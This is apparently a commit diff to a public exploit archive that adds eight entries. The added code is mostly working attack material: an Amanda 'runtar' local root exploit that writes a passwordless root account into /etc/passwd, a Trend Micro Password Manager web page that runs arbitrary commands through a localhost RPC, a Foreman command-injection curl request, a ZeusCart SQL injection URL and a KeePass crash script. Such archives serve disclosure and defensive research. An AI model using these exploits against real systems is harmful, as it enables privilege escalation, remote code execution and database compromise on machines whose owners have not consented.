DB: 2016-01-12

8 new exploits

files.csv

@@ -35461,3 +35461,11 @@ id,file,description,date,author,platform,type,port
 39212,platforms/php/webapps/39212.txt,"WordPress JW Player for Flash & HTML5 Video Plugin Cross Site Request Forgery Vulnerability",2014-06-10,"Tom Adams",php,webapps,0
 39213,platforms/php/webapps/39213.txt,"WordPress Featured Comments Plugin Cross Site Request Forgery Vulnerability",2014-06-10,"Tom Adams",php,webapps,0
 39214,platforms/linux/local/39214.c,"Linux Kernel <= 3.3.5 '/drivers/media/media-device.c' Local Information Disclosure Vulnerability",2014-05-28,"Salva Peiro",linux,local,0
+39216,platforms/windows/dos/39216.py,"KeePass Password Safe Classic 1.29 - Crash PoC",2016-01-11,"Mohammad Reza Espargham",windows,dos,0
+39217,platforms/linux/local/39217.c,"Amanda <= 3.3.1 - Local Root Exploit",2016-01-11,"Hacker Fantastic",linux,local,0
+39218,platforms/windows/remote/39218.html,"TrendMicro node.js HTTP Server Listening on localhost Can Execute Commands",2016-01-11,"Google Security Research",windows,remote,0
+39219,platforms/multiple/dos/39219.txt,"Adobe Flash BlurFilter Processing - Out-of-Bounds Memset",2016-01-11,"Google Security Research",multiple,dos,0
+39220,platforms/windows/dos/39220.txt,"Adobe Flash - Use-After-Free When Rendering Displays From Multiple Scripts",2016-01-11,"Google Security Research",windows,dos,0
+39221,platforms/win64/dos/39221.txt,"Adobe Flash - Use-After-Free When Setting Stage",2016-01-11,"Google Security Research",win64,dos,0
+39222,platforms/multiple/remote/39222.txt,"Foreman Smart-Proxy Remote Command Injection Vulnerability",2014-06-05,"Lukas Zapletal",multiple,remote,0
+39223,platforms/php/webapps/39223.txt,"ZeusCart 'prodid' Parameter SQL Injection Vulnerability",2014-06-24,"Kenny Mathis",php,webapps,0

platforms/linux/local/39217.c

@@ -0,0 +1,49 @@
+/*
+AMANDA, the Advanced Maryland Automatic Network Disk Archiver, is a backup 
+solution that allows the IT administrator to set up a single master backup
+server to back up multiple hosts over network to tape drives/changers or 
+disks or optical media. Amanda uses native utilities and formats (e.g. dump
+and/or GNU tar) and can back up a large number of servers and workstations
+running multiple versions of Linux or Unix. 
+
+A user with backup privs can trivially compromise a client installation.
+The "runtar" setuid root binary does not check for additional arguments
+supplied after --create, allowing users to manipulate commands and perform
+command injection as root. Tested against Amanda 3.3.1.
+
+An example is shown below:
+
+$ uname -a
+Linux raspberrypi 3.10.25 #1 Sat Dec 28 20:50:23 EST 2013 armv6l GNU/Linux
+$ ls -al /usr/lib/amanda/runtar
+-rwsr-xr-- 1 root backup 9776 Jul 29  2012 /usr/lib/amanda/runtar
+$ id
+uid=34(backup) gid=34(backup) groups=34(backup),6(disk),26(tape)
+$ cat /tmp/x.c
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+int main(){
+        setreuid(0,0);
+        setregid(0,0);
+        system("echo r00t::0:0::/:/bin/sh >> /etc/passwd");
+        exit(0);
+}
+
+/*
+$ su - r00t
+No passwd entry for user 'r00t'
+$ gcc x.c -o x
+$ /usr/lib/amanda/runtar NOCONFIG tar --create --rsh-command=/tmp/x -vf localhost:/tmp/lol /etc/passwd
+tar: localhost\:/tmp/lol: Cannot open: Input/output error
+tar: Error is not recoverable: exiting now
+$ su - r00t
+# id
+uid=0(root) gid=0(root) groups=0(root)
+
+ -- Hacker Fantastic
+*/

platforms/multiple/dos/39219.txt

@@ -0,0 +1,8 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=627
+
+The attached swf file causes an out-of-bounds memset in BlurFilter processing. Note that Chrome aborts when processing the swf
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39219.zip
+

platforms/multiple/remote/39222.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/68117/info
+
+Foreman is prone to a remote command-injection vulnerability.
+
+Successful exploits will result in the execution of arbitrary commands with the privileges of the user running foreman-proxy. 
+
+curl -3 -H "Accept:application/json" -k -X POST -d "dummy=exploit" 'https://www.example.com:8443/tftp/fetch_boot_file?prefix=a&path=%3Btouch%20%2Ftmp%2Fbusted%3B' 

platforms/php/webapps/39223.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/68182/info
+
+ZeusCart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+ZeusCart 4.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?do=addtocart&prodid=${PROD_ID} and sleep(1) 

platforms/win64/dos/39221.txt

@@ -0,0 +1,8 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=629
+
+The attached file causes a use-after-free when calling the stage setter. The PoC works most consistently in Firefox for 64-bit Windows.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39221.zip
+

platforms/windows/dos/39216.py

@@ -0,0 +1,37 @@
+# Title : KeePass Password Safe Classic 1.29 - Crash Proof Of Concept
+# Affected Versions: All Version
+# Founder : keepass.info
+# Tested on Windows 7 / Server 2008
+# Download Link : http://sourceforge.net/projects/keepass/files/KeePass%201.x/1.30/KeePass-1.30.zip
+#
+#
+# Author      :   Mohammad Reza Espargham
+# Linkedin    :   https://ir.linkedin.com/in/rezasp
+# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
+# Website     :   www.reza.es
+# Twitter     :   https://twitter.com/rezesp
+# FaceBook    :   https://www.facebook.com/reza.espargham
+#
+#
+# 1 . run python code : python crash.py
+# 2 . open “KeePass”
+# 3 . File —> New (Create New Password Database)
+# 4 . File —> Import —> CSV File…
+# 5 . open r3z4.csv
+# 6 . Right Click on “R3Z4” username and edit
+# 7 . Crashed ;)
+
+
+
+#!/usr/bin/env python
+hdr = '"' #start syntax
+hcr = "R3Z4" #user
+oth = ',"' #user
+oth2 = '","",""' #user
+val=','
+crash = "\x41"*199289 #B0F
+exp = hdr+hcr+hdr+val+hdr+hcr+hdr+oth+crash+oth2
+file = open("r3z4.csv", "w")
+file.write(exp)
+file.close()
+

platforms/windows/dos/39220.txt

@@ -0,0 +1,8 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=628
+
+There is a use-after-free that appears to be related to rendering the display based on multiple scripts. A PoC is attached, tested on Windows only. Note the PoC is somewhat unreliable on some browsers, sometimes it needs to render a minute or two in the foreground before crashing. This is related to unreliability in the freed object being reallocated as a value that causes the crash, not unreliability in the underlying bug (it crashes immediately in a debug build of Flash). With enough effort, an attacker could likely trigger the issue immediately.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39220.zip
+

platforms/windows/remote/39218.html

@@ -0,0 +1,62 @@
+<!--
+Source: https://code.google.com/p/google-security-research/issues/detail?id=693
+
+When you install TrendMicro Antivirus on Windows, by default a component called Password Manager is also installed and automatically launched on startup.
+
+http://www.trendmicro.com/us/home/products/software/password-manager/index.html
+
+This product is primarily written in JavaScript with node.js, and opens multiple HTTP RPC ports for handling API requests.
+
+It took about 30 seconds to spot one that permits arbitrary command execution, openUrlInDefaultBrowser, which eventually maps to ShellExecute().
+
+This means any website can launch arbitrary commands, like this:
+
+x = new XMLHttpRequest()
+x.open("GET", "https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe true);
+try { x.send(); } catch (e) {};
+
+(Note that you cannot read the response due to the same origin policy, but it doesn't matter - the command is still executed).
+-->
+
+<html>
+<head>
+    <title>Trend Micro Maximum Security 10 Exploit</title>
+</head>
+<body>
+    <p>
+    Sample exploit for Trend Micro Maximum Security 10.
+    <p>
+    -- Tavis Ormandy.
+    <p>
+    Command: <input id="command" value="C:/PROGRA~1/TRENDM~1/Titanium/Remove.exe" size="64">
+    <p>
+    <a href="javascript:begin()">Click Here</a> to run the command above (the default will uninstall Trend Micro Maximum).
+    <p>
+    <img src="http://reactiongifs.us/wp-content/uploads/2013/02/awesome_to_the_max.gif">
+<script>
+    function begin() {
+        // The command you want to run, arguments will work but don't use single quotes.
+        // Lets uninstall Trend Micro.
+        var cmd  = document.getElementById('command').value;
+
+        // Start port, Trend Micro trys top open a port starting here until it works.
+        var port = 49155;
+
+        // Wrapper code to start cmd.
+        var code = "topWindow.require('child_process').spawn('cmd', [ '/c', '" + cmd + "' ])"
+
+        // We can't send quotes, so encode that via character codes.
+        code = code.split('').map(function(a){ return a.charCodeAt(0) }).join(',');
+
+        // Create the XHR's
+        for (; port <= 49160; port++) {
+            var x = new XMLHttpRequest();
+
+            x.open('GET', 'https://localhost:' + port + '/api/showSB?url=javascript:eval(String.fromCharCode(' + code + '))', false);
+
+            // We can't tell if it worked because of the cross domain policy.
+            try { x.send(); } catch (e) {};
+        }
+    }
+</script>
+